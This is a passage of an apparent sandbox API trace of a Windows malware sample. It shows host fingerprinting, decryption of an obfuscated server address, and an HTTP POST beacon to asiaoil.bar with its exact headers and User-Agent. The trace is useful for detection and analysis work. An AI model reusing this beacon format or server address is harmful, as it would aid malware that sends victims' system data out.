hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5d0 | out: hHeap=0x740000) returned 1 [0265.190] GetProcessHeap () returned 0x740000 [0265.191] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 [0265.191] GetProcessHeap () returned 0x740000 [0265.191] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74bad0 | out: hHeap=0x740000) returned 1 [0265.191] GetProcessHeap () returned 0x740000 [0265.191] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1388) returned 0x755058 [0265.191] GetProcessHeap () returned 0x740000 [0265.191] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x75c1f0 [0265.191] GetProcessHeap () returned 0x740000 [0265.191] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0265.192] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0265.192] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0265.193] GetProcessHeap () returned 0x740000 [0265.193] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x764640 [0265.193] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.195] wvsprintfW (in: param_1=0x764640, param_2="%s\\%s", arglist=0x19f9e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0265.195] GetProcessHeap () returned 0x740000 [0265.195] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x7631b8 [0265.195] GetProcessHeap () returned 0x740000 [0265.195] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764640 | out: hHeap=0x740000) returned 1 [0265.196] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0265.196] GetProcessHeap () returned 0x740000 [0265.196] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f50) returned 0x764640 [0265.197] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.198] wvsprintfW (in: param_1=0x764640, param_2="%s\\%s.%s", arglist=0x19f9f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 55 [0265.198] GetProcessHeap () returned 0x740000 [0265.198] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757298 [0265.198] GetProcessHeap () returned 0x740000 [0265.198] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764640 | out: hHeap=0x740000) returned 1 [0265.248] GetProcessHeap () returned 0x740000 [0265.248] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7631b8 | out: hHeap=0x740000) returned 1 [0265.249] GetProcessHeap () returned 0x740000 [0265.249] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0265.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.250] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 0 [0265.251] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0265.252] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0265.254] WriteFile (in: hFile=0x264, lpBuffer=0x19fbbc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19fb80, lpOverlapped=0x0 | out: lpBuffer=0x19fbbc*, lpNumberOfBytesWritten=0x19fb80*=0x1, lpOverlapped=0x0) returned 1 [0265.255] CloseHandle (hObject=0x264) returned 1 [0265.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.258] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb9c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fba4 | out: pSid=0x19fba4*=0x75c220*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0265.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.259] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x75c220*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fba8 | out: IsMember=0x19fba8) returned 1 [0265.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.260] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck")) returned 1 [0265.262] GetProcessHeap () returned 0x740000 [0265.262] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757298 | out: hHeap=0x740000) returned 1 [0265.262] GetProcessHeap () returned 0x740000 [0265.262] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1388) returned 0x75ca78 [0265.262] GetProcessHeap () returned 0x740000 [0265.262] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x75c478 [0265.262] GetProcessHeap () returned 0x740000 [0265.262] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x11c) returned 0x7631b8 [0265.263] RtlGetVersion (in: lpVersionInformation=0x7631b8 | out: lpVersionInformation=0x7631b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0265.263] GetProcessHeap () returned 0x740000 [0265.264] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7631b8 | out: hHeap=0x740000) returned 1 [0265.264] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0x5f85e632, dwHighDateTime=0x1d81e4a)) [0265.264] GetProcessHeap () returned 0x740000 [0265.264] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7) returned 0x75b5b0 [0265.264] GetProcessHeap () returned 0x740000 [0265.264] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0265.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.266] GetUserNameW (in: lpBuffer=0x75a488, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0265.266] GetProcessHeap () returned 0x740000 [0265.267] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0265.267] GetProcessHeap () returned 0x740000 [0265.267] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0265.267] GetComputerNameW (in: lpBuffer=0x75a488, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0265.267] GetProcessHeap () returned 0x740000 [0265.268] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0265.268] GetCurrentThread () returned 0xfffffffe [0265.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.270] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0265.270] GetLastError () returned 0x3f0 [0265.270] GetCurrentProcess () returned 0xffffffff [0265.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.271] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x254) returned 1 [0265.271] GetProcessHeap () returned 0x740000 [0265.271] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0265.271] GetProcessHeap () returned 0x740000 [0265.271] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75f488 [0265.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.280] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0265.281] GetProcessHeap () returned 0x740000 [0265.281] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0265.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.282] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x758478, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x758478, ReturnLength=0x19fb70) returned 1 [0265.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.284] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x758480*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x75a488, cchName=0x19fb60, ReferencedDomainName=0x75f488, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0265.286] GetProcessHeap () returned 0x740000 [0265.286] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f44) returned 0x764640 [0265.287] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.288] wvsprintfW (in: param_1=0x764640, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0265.288] GetProcessHeap () returned 0x740000 [0265.288] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c280 [0265.288] GetProcessHeap () returned 0x740000 [0265.289] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764640 | out: hHeap=0x740000) returned 1 [0265.290] GetProcessHeap () returned 0x740000 [0265.290] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0265.290] CloseHandle (hObject=0x254) returned 1 [0265.291] GetProcessHeap () returned 0x740000 [0265.291] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75f488 | out: hHeap=0x740000) returned 1 [0265.291] GetProcessHeap () returned 0x740000 [0265.291] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0265.291] GetProcessHeap () returned 0x740000 [0265.291] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c280 | out: hHeap=0x740000) returned 1 [0265.292] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.293] GetDesktopWindow () returned 0x10010 [0265.380] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.380] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0265.381] GetProcessHeap () returned 0x740000 [0265.381] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8) returned 0x75b5c0 [0265.381] GetProcessHeap () returned 0x740000 [0265.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5c0 | out: hHeap=0x740000) returned 1 [0265.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.382] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0265.383] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x755e0000 [0265.384] GetProcAddress (hModule=0x755e0000, lpProcName="NetUserGetInfo") returned 0x67df33a0 [0265.384] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x7638f0*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xc459c2, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0265.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.393] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x75c490*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0265.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.394] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x75c490*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0265.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.396] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0265.396] GetProcessHeap () returned 0x740000 [0265.396] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763c08 [0265.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.485] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0265.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.493] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x7631b8) returned 1 [0265.501] GetProcessHeap () returned 0x740000 [0265.501] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0265.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.502] CryptImportKey (in: hProv=0x7631b8, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x74d768) returned 1 [0265.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.504] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0265.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.505] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.505] GetProcessHeap () returned 0x740000 [0265.506] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0265.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.611] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763c08, pdwDataLen=0x19f974 | out: pbData=0x763c08, pdwDataLen=0x19f974) returned 1 [0265.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.612] CryptDestroyKey (hKey=0x74d768) returned 1 [0265.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.614] CryptReleaseContext (hProv=0x7631b8, dwFlags=0x0) returned 1 [0265.614] GetProcessHeap () returned 0x740000 [0265.614] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x75f488 [0265.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.615] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.616] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.617] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.617] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.618] GetProcessHeap () returned 0x740000 [0265.618] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0265.618] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x0) returned 11001 [0265.621] GetProcessHeap () returned 0x740000 [0265.622] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0265.622] GetProcessHeap () returned 0x740000 [0265.622] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75f488 | out: hHeap=0x740000) returned 1 [0265.622] GetProcessHeap () returned 0x740000 [0265.623] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c08 | out: hHeap=0x740000) returned 1 [0265.623] GetProcessHeap () returned 0x740000 [0265.623] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763aa0 [0265.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.716] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0265.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.724] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x7631b8) returned 1 [0265.733] GetProcessHeap () returned 0x740000 [0265.733] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758658 [0265.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.735] CryptImportKey (in: hProv=0x7631b8, pbData=0x758658, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x74d768) returned 1 [0265.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.736] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0265.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.738] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.738] GetProcessHeap () returned 0x740000 [0265.738] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758658 | out: hHeap=0x740000) returned 1 [0265.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.845] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763aa0, pdwDataLen=0x19f974 | out: pbData=0x763aa0, pdwDataLen=0x19f974) returned 1 [0265.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.846] CryptDestroyKey (hKey=0x74d768) returned 1 [0265.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0265.847] CryptReleaseContext (hProv=0x7631b8, dwFlags=0x0) returned 1 [0265.847] GetProcessHeap () returned 0x740000 [0265.847] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x7669d8 [0265.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.850] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0265.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.852] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0265.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.853] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0265.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0265.854] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0265.854] GetProcessHeap () returned 0x740000 [0265.854] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0265.854] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x75bfd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c0c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0266.136] GetProcessHeap () returned 0x740000 [0266.137] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b510 [0266.137] socket (af=2, type=1, protocol=6) returned 0x268 [0266.137] connect (s=0x268, name=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0267.196] FreeAddrInfoW (pAddrInfo=0x75bfd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c0c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0267.196] GetProcessHeap () returned 0x740000 [0267.196] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75a488 [0267.197] GetProcessHeap () returned 0x740000 [0267.197] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0267.197] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0267.198] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0267.198] GetProcessHeap () returned 0x740000 [0267.198] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75a510 [0267.198] GetProcessHeap () returned 0x740000 [0267.199] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0267.199] GetProcessHeap () returned 0x740000 [0267.199] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0267.199] GetProcessHeap () returned 0x740000 [0267.199] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0267.200] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0267.200] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 186\r\nConnection: close\r\n\r\n") returned 243 [0267.200] GetProcessHeap () returned 0x740000 [0267.201] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x75f488 [0267.201] GetProcessHeap () returned 0x740000 [0267.201] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0267.201] send (s=0x268, buf=0x75f488*, len=243, flags=0) returned 243 [0267.202] send (s=0x268, buf=0x75ca78*, len=186, flags=0) returned 186 [0267.202] GetProcessHeap () returned 0x740000 [0267.202] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x767650 [0267.202] recv (in: s=0x268, buf=0x767650, len=4048, flags=0 | out: buf=0x767650*) returned 563 [0267.503] GetProcessHeap () returned 0x740000 [0267.503] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75f488 | out: hHeap=0x740000) returned 1 [0267.503] GetProcessHeap () returned 0x740000 [0267.504] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0267.504] GetProcessHeap () returned 0x740000 [0267.504] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a510 | out: hHeap=0x740000) returned 1 [0267.504] GetProcessHeap () returned 0x740000 [0267.505] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0267.505] closesocket (s=0x268) returned 0 [0267.506] GetProcessHeap () returned 0x740000 [0267.506] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b510 | out: hHeap=0x740000) returned 1 [0267.506] GetProcessHeap () returned 0x740000 [0267.506] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x740000) returned 1 [0267.506] GetProcessHeap () returned 0x740000 [0267.506] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763aa0 | out: hHeap=0x740000) returned 1 [0267.507] GetProcessHeap () returned 0x740000 [0267.507] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0267.507] GetProcessHeap () returned 0x740000 [0267.507] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0267.770] GetProcessHeap () returned 